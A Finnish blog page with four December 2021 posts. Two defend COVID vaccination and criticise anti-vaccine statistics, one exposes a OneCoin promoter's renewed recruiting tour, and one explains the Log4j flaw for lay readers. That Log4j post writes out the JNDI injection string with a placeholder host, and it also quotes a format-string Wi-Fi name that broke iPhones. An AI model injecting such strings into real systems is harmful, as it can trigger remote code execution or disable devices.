Linkit

sunnuntai 19. joulukuuta 2021

Korona on epäluottamuksen epidemia - minulla on oikeus sairastua koronaan!

Omikron-muunnos on kääntänyt koronaennusteet jälleen synkiksi ja se näkyy nettikeskusteluissa. Valtaosa vastustajista näyttää olevan äskettäin perustettuja nimimerkkejä, joilla on vain muutama kymmenen seuraajaa. Helsingin Sanomien juttu kertoi, miten sanavalinnat ja argumentit ovat tuontitavaraa Saksasta, ja sinne niitä uitetaan Venäjältä. Rokotevastaisuus ja vapausretoriikka tulevat ulkomailta. Ei ihme, että rokotepassin yhteydessä vedotaan natseihin ja Nürnbergin oikeudenkäyntiin.

On hyvä, että aiheesta keskustellaan, kunhan keskustelu perustuu joko faktoihin tai aitoihin tunteisiin. Ikävä kyllä moni levittää joko tarkoituksella tai tahattomasti valheita ja disinformaatiota. Sitten on niitäkin, jotka muuttavat mielipiteitään niin, että saavat tykkäyksiä ja näkyvyyttä, joskus jopa nostetta omalle bisnekselle tai poliittiselle uralle. 

Osa laukoo mitä tahansa mielipiteitä ajatustensa ja kannattajiensa tueksi miettimättä niitä lainkaan. Tehohoidon lisääminen rokotusten sijaan on kaikkien pöhköimmästä päästä. 

Aivan kuin nämä ihmiset huutaisivat "Lisää tehohoitopaikkoja! Minulla on oikeus sairastua koronaan ja joutua teholle!"

Pitääkö suomalaisella olla oikeus sairastua koronaan ja valtiolla velvollisuus parantaa hänet siitä? Unohtaen sen inhmillisen kärsimyksen, jota sairaalaan tai teho-osastolle joutumisesta seuraa, on järkevää panostaa kaikki mahdollinen ennaltaehkäisyyn. Kukaan ei halua sairastua oman vakaumuksensa vuoksi, vaikka ei siihen kuolisikaan.

Internetin rajattomien tietovarastojen piti tehdä ihmisistä fiksumpia. Jostain syystä se on tehnyt meistä entistä helpommin johdateltavia ja manipuloitavia. Kriittinen ajattelu on aina hyväksi, mutta "do your own research" ei toteutu katsomalla lisää harrastelijoiden tekemiä Youtube-videoita.

Koronasta näyttää tulleen yhteiskunnallinen epäluottamuksen epidemia. Koulutetut ihmiset ottavat rokotteita ja noudattavat ohjeita paremmin kuin vähän koulutetut. Lääkärit ovat rokottaneet itsensä, perushoitajissa kattavuus on huomattavasti matalampi.

Ajatusleikkinä mietin, millainen Suomi jäisi jäljelle, jos rokotetut kuolisivat viiden vuoden päästä vakaviin komplikaatioihin. Mitenkähän jäljelle jääneet pyörittäisivät maata keskenään?

Olen yrittänyt keskustella koronaepäilijöiden kanssa selvittääkseni heidän ajatteluaan. Olen saanut lähinnä lapsellisia väitteitä siitä, miten lääketehtaat lahjovat poliitikkoja ja maksimoivat voittojaan. Eri mieltä olevia löytyy aina, mutta miksi uskoa 1 % epäilijöitä jos 99 % lääkäreistä ja asiantuntijoista on rokotteen kannalla ja ottaa sen itsekin?

Mietitäänpä hetki, mikä voisi kaikkien rokotteita valmistavien lääketehtaiden salaliiton motiivina. Tehtaat hyötyvät siitä, että ihmiset elävät vanhoiksi, jolloin heille ehtii myydä enemmän lääkkeitä. Pandemian pitkittäminen haittaa maailmataloutta ja epävarmuus laskee niin pörssikursseja kuin voittojakin. Pitkittäminen tai maapallon ihmisten vähentäminen ei voi olla yhdenkään yrityksen tavoite, koska se olisi yksinkertaisesti huonoa bisnestä.

Koskaan ei silti kannata hirttäytyä yhteen totuuteen, ei edes korona-asiassa. Tässä koettelemuksessa on nähty jo niin monta käännettä, että mitä vain voi vielä tapahtua.

sunnuntai 12. joulukuuta 2021

Esimakua kyberpandemiasta

Turvallisuusalalla on pitkään spekuloitu kyberpandemian mahdollisuudella. Heräämmekö jonain päivänä maailmaan, jossa tietomurrot tai haittaohjelmat riivaavat kaikkia järjestelmiä saaden yhteiskunnan ja kansalaisten arjen sekaisin?

Tänä viikonloppuna on saatu esimakua kyberpandemiasta. Syynä on Log4j-niminen Java-komponentti, jota käytetään monissa nettipalveluissa. Ohjelmassa on ominaisuus, joka mahdollistaa yksinkertaisen hyökkäyksen: välittämällä palveluun yksinkertainen merkkijono palvelin saadaan hakemaan mistä tahansa nettiosoitteesta koodia, joka suoritetaan saman tien. 

Haavoittuvuuksia on ollut aina, mutta Log4j on omaa luokkaansa. Sitä ei ole turhaan sanottu vuosisadan pahimmaksi tietoturva-aukoksi. Kyseessä ei ole varsinainen bugi, vaan pikemminkin suunnitteluvirhe, jota kukaan ei ole tiettävästi aiemmin huomannut käyttää hyödyksi.

Aiempi OpenSSL-haavoittuvuus, suomalaisten löytämä Heartbleed (2014), vaikutti laajalle ja havahdutti huomaamaan avoimen lähdekoodin ongelmat. Sen hyödyntäminen oli kuitenkin hankalaa ja vaati teknistä osaamista. Log4j on aivan toista maata: riittää, että vaihtaa selaimen tai puhelimen merkkijonoksi ${jndi:ldap://url-osoite-tähän/a} ja kertoo, mistä osoitteesta hyökkäyskoodi haetaan. Lapsikin sen osaa. Jopa tämä blogiteksti saattaa laukaista koodin hakuyrityksen, joskin url-osoite-tähän on osoitteena vaaraton.

Hieman vastaavia ongelmia on ollut aiemminkin iPhone-puhelimissa. Kesällä uutisoitiin, miten iPhonen verkkoasetukset hajoavat, jos puhelimella liittyy %p%s%s%s%s%n -nimiseen wifi-verkkoon. Edes puhelimen uudelleenkäynnistys ei auta. Aiemmin puhelimen on voinut sammuttaa lisäämällä tekstiviestiin tietyn merkkiyhdistelmän.

Nyt Log4j:n vaarallinen ominaisuus on korjattu, mutta korjausten asentaminen kaikkiin haavoittuviin järjestelmiin on jättimäinen työ. Kyse ei ole pelkistä nettipalveluista, vaan Log4j-komponenttia on tavattu myös erilaisista elektroniikkalaitteista. Suurin osa palveluista ei edes tiedä, että jossain koneiston uumenissa on haavoittuva palanen. Se selviää vain kokeilemalla, miten palvelu vastaa hakkerointiyritykseen.

Täsä Githubin listasta saa jonkinlaisen aavistuksen ongelman laajuudesta. 

Nykyiset tietojärjestelmät koostuvat sadoista komponenteista, joista suurin osa on nettiyhteisön kehittämiä tai ylläpitämiä. Niitä pinotaan päällekkäin ja rinnakkain ilman, että kukaan tietää, mitä haavoittuvuuksia pinoon jää. "Avoin lähdekoodi on turvallista, koska kuka tahansa voi nähdä virheet" on vanha mantra, joka ei pidä enää paikkaansa. 

Kaikki käyttävät vapaita ohjelmia -- toisten kirjoittamaa koodia -- eikä kukaan vastaa kokonaisuudesta. Kriittistä koodia saattaa ylläpitää joku yksittäinen henkilö oman työnsä ohella, tai sitten sitä ei ylläpidä enää kukaan. Log4j:n ylläpidosta huolehtii tiettävästi kolme tai neljä henkilöä, ja hekin vain vapaa-ajan projektina. Silti miljoonat ihmiset ja laitteet käyttävät heidän ilmaistyötään.

Tapahtuma herättää kysymään, millaisia pommeja nettipalveluissa piilee? Kuka löytää ne ensimmäisenä - rosvot, tiedustelupalvelut vai valkohattuhakkerit? Tämä viikonloppu ainakin on IT-ylläpidon painajainen. Luultavasti ensi viikolla tulemme näkemään monia tietomurtoja ja vahingontekoja. Joululomat on peruttu muiltakin kuin teho-osaston hoitajilta.

On ollut kiinnostavaa seurata Suomen uutisointia asiasta. Maailmalla Log4j on iso uutinen, "internet is on fire!". Suomessa sen ovat noteeranneet Ilta-Sanomat, Iltalehti ja Helsingin Sanomat. Yle ei vielä tähän mennessä ole reagoinut. It-maailmaa ymmärtäviä toimittajia on vähän, eikä heitä ole viikonloppuisin vuorossa. Tivi-lehti kirjoitti asiasta jo perjantaina, jolloin vakavuudesta ei ollut vielä täyttä selvyyttä. Tilanteen vaarallisuus on paljastunut vasta viikonlopun kuluessa. 

Voi vain toivoa, että jos kyberpandemia joskus iskee, se ei ala ainakaan viikonloppuna.

Lisäys 14.12.2021: Vaaralliseksi osoittautunut ominaisuus lisättiin Apache Log4j-komponenttiin versiossa 2.0-beta9, joka julkaistiin 21.9.2013. Vaara huomattiin yli kahdeksan vuotta myöhemmin ja varoitus julkaistiin 9.12.2021. Siinä välissä kukaan ei huomannut asiaa tai ei ainakaan raportoinut siitä vaan käytti aukkoa itse tietomurtoihin. Mitähän muita pommeja järjestelmissä tikittää? 

JNDI injection -riskistä oli esitelmä Black Hat 2016 -konferenssissa, mutta puhujat eivät itsekään osanneet yhdistää uhkaa Apache Strutsiin. 

Nyt huolestuttavin skenaario on, että joku kirjoittaa haavoittuvuutta hyödyntävän madon. Se voisi levitä palvelimesta toiseen ja halvaannuttaa ison osan internetiä.

maanantai 6. joulukuuta 2021

Vuorinen: Cryptocurrency ONE is doing better than ever - Now totally new era is starting!!!

Itsenäisyyspäivän kunniaksi muistamme, että suomalaiset ovat sisukkaita. Joskus olisi kuitenkin viisaampaa luovuttaa ja lopettaa pään hakkaaminen seinään. Paraskaan sisu ei pysty muuttamaan faktoja.

Tommi Vuorinen on taas aktivoinut ja kiertää eri puolilla Suomea järjestämässä Onecoin-markkinointitilaisuuksia. Tuoreella englanninkielisellä videolla Vuorinen sanoo tekevänsä "restart" Onecoinille Suomessa. Olen saanut kuvia ja kommentteja mm. Jyväskylästä, Seinäjoelta, Turusta ja Helsingistä. Uskomatonta kyllä, ABC-asemilla järjestettäviin tilaisuuksiin riittää vieläkin osallistujia. Maailmaa mullistava finanssivallankumous on palannut huoltoasemille!

Voiko Suomessa olla vielä ihmisiä, jotka uskovat Vuorisen lupauksia tulevaisuuden kryptovaluutasta? Vuorinen on kansainvälisistä Onecoin-promoottoreista ainoa, joka soittaa edelleen samaa levyä. Muut alusta lähtien mukana olleet ovat nostaneet kytkintä, osa miljoonien kera. Tommi Vuorinen on ainoa, joka jatkaa sisukkaasti kuolleen verkostomarkkinointihuijauksen tekohengitystä.

"Today we have Ethereum based blockchain..."

En tarkalleen tiedä, mitä Vuorinen nykyään lupailee. Ytimessä on edelleen mielikuvitusvaluutta Onecoin, jolla on 42,43 euron mielikuvitusarvo. Painopistettä on kuitenkin siirretty OneEcosystemiin, jonka pitäisi toimia mielikuvitusvaluuttaa käyttävänä globaalina kauppapaikkana. 

Jos tunnet jonkun, joka on käynyt Vuorisen uusissa tilaisuuksissa, kysypä mitä siellä on lupailtu ja miten lupaukset on otettu vastaan. Värväystilaisuuksia ei mainosteta avoimesti, joten niihin on vaikea päästä mukaan.

Mitä ikinä Onecoiniin liittyen luvataankin, siihen ei kannata luottaa. Vaikka Onecoinilla vihdoin olisi oikea, Ethereumin sisällä toimiva lohkoketju, se ei anna valuutalle minkäänlaista arvoa. Laskujeni mukaan kyseessä olisi jo neljäs lohkoketju, kolme ensimmäistä ovat osoittautuneet valheiksi. Lohkoketjun vaihtaminen uuteen romuttaa koko kryptovaluutan idean, joka perustuu juuri lohkoketjun luotettavuuteen ja muuttumattomuuteen.

Miksi neljäs lohkoketju olisi aiempia todellisempi? Vaikka neljäs kerta sanoisi toden, mistä Onecoineille syntyisi minkäänlaista arvoa, kun vaihtopörssiä ei ole? Leikkirahan käyttö sisäisellä kauppapaikalla on puhdasta pelleilyä. Jo aiemmissa ketjuissa on ollut kymmeniä miljardeja kolikkoja ja lisää luodaan koko ajan. 

Vuorinen Turun ABC-asemalla.

Kymmeniä miljardeja kolikkoja ja jokainen niistä 42,43 euron arvoisia? Ihan varmasti. Onecoinin markkinahinta on nolla euroa ja laskee edelleen lisääntyvien kolikkojen myötä. Bitcoinin arvo on Vuorisen aikana seitsemässä vuodessa noussut noin 220-kertaiseksi, vaikka Vuorinen kehui Onecoinin olevan parempi kuin Bitcoin. Onecoiniin sijoittaneet ovat menettäneet rahansa. 

Netissä osui silmiini Vuorisen englanninkielinen videokeskustelu brittiläisen Tabita Omamogho -nimisen henkilön kanssa ("Tabita HolisticFit"). Vuorinen kertasi Onecoinin syntyhistorian, että oli mukana alusta (elokuusta 2014) lähtien, tapasi Veskan ja Konstantinin, osallistui Rujan 35-vuotispäiville 31.5.2015 ja on jatkanut siitä lähtien ainoana Onecoin-sanoman levittämistä.

Tommi Vuorinen lupaa ensi vuodeksi Onecoin-tsunamin, kun toiminta käynnistyy uudelleen.

Vuorisen mukaan ensi vuodesta tulee oikea tsunami, kun kaikki palaset asettuvat paikoilleen. On uusi Ethereum-pohjainen lohkoketju ja kaikki. On jopa tekeillä "legal opinion" suuren suomalaisen asianajotoimiston kanssa - sen haluan nähdä! Saksalainen alkuperäisen legal opinion laatija Breidenbach on itse vastaamassa oikeudessa.

"Nyt on paras hetki tulla mukaan, yhtiö on ratkaissut kaikki ongelmansa!" hän hehkuttaa videon lopuksi Tabitalle, joka on jo valmiiksi uskossa ja intoa täynnä. "En ole lähdössä mihinkään, pysyn täällä kuin kallio (rock)", hän lupaa Tabitalle.

Tabita on vaikuttunut Tommin puheista, koska tämä on ollut mukana alusta lähtien.

On vaikea ymmärtää, miksi Suomen viranomaiset katsovat edelleen poispäin ja antavat Vuorisen touhuta vapaasti. Jo yksin vanhat valheet ja petetyt lupaukset riittäisivät rikossyytteiden nostamiseen.

Voit katsoa Vuorisen ja Omamoghon keskustelun Youtubesta, johon joku on sen siirtänyt.

keskiviikko 1. joulukuuta 2021

Numerot kertovat koronarokotuksen tehosta, ei tehottomuudesta

Olen yrittänyt seurata rokotevastaisten ja koronan vakavuutta vähättelevien kirjoittelua sosiaalisessa mediassa ymmärtääkseni, millaisia perusteluita he käyttävät epäilyksilleen. Yleensä perustelut ovat puhtaasti psykologisia - muiden on helppo lietsoa pelkoa ja epäilyksiä argumenteilla, jotka eivät kestä lähempää tarkastelua. Tässä yksi esimerkki. 

Milla Tiuni (ei selvästikään oikea nimi) julkaisi Twitterissä listan, kuinka moni sairalaahoitoon viikon aikana tulleista potilaista on saanut koronarokotuksen.

Rokotettujen osuus hoidettavista nousee, rokote ei siis toimi?

Oletan, että lista on aito, vaikka eihän sitä voi tietää. Luvuissa on viikkokohtaisesti kappalemäärä ja kauttaviivan jälkeen prosenttiosuus kyseisestä viikosta. Viimeinen rivi 22-28.11. kertoo, että sairaalaan on otettu 15 rokottamatonta ja 14 kahdesti rokotettua, jopa yksi kolmasti rokotettu. 

Ensi katsomalta luvut ovat tylyjä: viikko viikolta yhä suurempi osa sairaalaan joutuvista on saanut molemmat rokotteet! Viimeisellä rivillä rokotettuja on jo puolet kaikista.

Mutta ei tilastoa näin lueta. Mitä suuremmaksi rokotekattavuus nousee, sitä suuremmaksi nousee myös rokotettujen osuus kaikista tartunnoista. Jos kattavuus on jonain päivänä 100 %, silloin kaikki sairastuneet ovat rokotettuja ja voi jopa väittää, että rokote suorastaan aiheuttaa terveysongelmia.

Päinvastoin kuin "Milla Tiuni" ymmärsi, taulukko kertoo rokotuksen hyödyistä. Jos rokotekattavuus on 80 % ja rokote olisi tehoton, potilaiden tulisi jakautua samassa suhteessa 20/80. Jako on kuitenkin 50/50, eli rokotus vähentää riskin neljäsosaan.  

Lisäksi kahdesti ja kolmasti rokotetuissa on keskimääräistä enemmän yli 60-vuotiaita ja perussairaita, jotka muutenkin ovat alttiimpia joutumaan sairaalaan viruksen iskiessä. Riskiryhmät rokotettiin ensimmäisten joukossa. Jos rokote aiheuttaisi haittaa, se näkyisi ylikuolleisuutena.

Vielä yksi vääristymä: taulukko ei kerro mitään oireiden vakavuudesta eikä paranemisajasta. Todennäköisesti rokottamattomat oireilevat vahvemmin ja pidempään kuin rokotetut. 

Tilasto, jonka piti osoittaa rokotteiden tehottomuus, osoittaa siis täysin päinvastaista - kunhan sitä vain tulkitsee oikein eikä mene suoraan painamaan Jaa-nappia.

Rokotettujakin sairastuu eikä mikään rokote estä 100-prosenttisesti tartuntoja. Miksi ottaa rokote, jos se ei poista riskiä kokonaan?

Miksi käyttää turvavöitä, vaikka kolareissa edelleen kuolee ihmisiä? Itse asiassa vyön käyttäjiä kuolee hieman enemmän kuin käyttämättömiä. Silti kukaan ei kuvittele, että vyön käyttämättömyys parantaisi selviämismahdollisuuksia kolarin sattuessa. 

Turvavyö toimii kuten rokotus: se vähentää loukaantumisen riskiä kolarin sattuessa. Vyötä kannattaa käyttää, vaikka olisi itse taitava kuljettaja ja vakavan onnettomuuden riski on hyvin pieni. 

Harvinaisissa tapauksissa turvavyö voi pahentaa vammoja. Joissakin tieltäsuistumistapauksissa vyötön matkustaja olisi sinkoutunut autosta ulos ja pelastunut, mutta vöihin sidottuna on menehtynyt esimerkiksi auton päädyttyä katolleen. Siitä huolimatta laki määrää vöiden käytön pakolliseksi. Mikään turvatekniikka ei ole sataprosenttinen.

Ja pakkoon ollaan menossa rokotustenkin suhteen eräissä Keski-Euroopan maissa.